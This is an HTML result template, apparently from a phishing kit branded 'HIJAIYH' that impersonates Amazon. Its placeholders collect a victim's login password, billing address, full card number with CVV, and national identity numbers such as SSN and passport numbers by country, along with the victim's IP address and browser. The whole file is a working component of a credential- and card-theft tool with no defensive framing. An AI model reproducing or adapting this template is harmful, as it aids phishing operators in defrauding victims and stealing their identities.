<fieldset style="border: 2px solid #0061ff;border-radius:10px;max-width: 60%;margin: 0 auto"><legend><b><font color="red">POWERED BY </font><font color="blue">HIJAIYH:</font><font color="orange">AMAZON</font></b></legend>
<pre>
<b>## Account Information ##</b>
<font color="red">
## Username          :: {username}
## Password          :: {password}
</font>
<b>## Billing Information ##</b>
<font color="#b7ae00">
## Fullname          :: {fullname}
## Address           :: {address}
## City              :: {city}
## State             :: {state}
## country           :: {country}
## Zip/Postcode      :: {postcode}
## BirthDay          :: {birthday}
## Phone             :: {phone}
</font>

<b>## Card Information ##</b>
<font color="#087f00">
## Bank              :: {bank}
## Brand - Type      :: {brandtype}
## Level - Country   :: {levelcountry}
## CardHolders       :: {cardholder}
## CardNumber        :: {cardnumber}
## Expired Date      :: {expired}
## Security (CVV)    :: {cvv}
## Amex CID          :: {cid}
## Copy              :: {copy}
## AutoPay           :: {autopay}
</font>
<b>## Addtional Information ##</b>
<font color="#0800ff">
## SSN               :: {ssn}           [US,CA]
## Qatar ID          :: {qatarid}       [QA]
## ID Number         :: {idnumber}      [GR,HK]
## Citizen ID        :: {citizenid}     [TH]
## National ID       :: {nationalid}    [SA]
## Sort Code         :: {sortcode}      [UK,IE]
## Passport Number   :: {passport}      [CY]
## Civil ID          :: {civilid}       [KW]
## Bank Access Number:: {ban}           [NZ]
## Account Number    :: {accno}         [UK,IE,IN,CH]
## Credit Limit      :: {climit}        [IE,TH,IN,NZ,AU]
## Bank Account      :: {bankaccount}   [AU]
## NAB ID/OSID       :: {nabid}         [AU]
## CARD ID           :: {cardid}        [JP,CH]
## CARD PASSWORD     :: {cardpass}      [JP,CH]
</font>
<b>## Access Information ##</b>
<font color="#0071ce">
## User Agent        :: {useragent}  
## IP Address        :: {ip}
## Country           :: {country}
## Date              :: {date}
</font>
</pre>
</fieldset>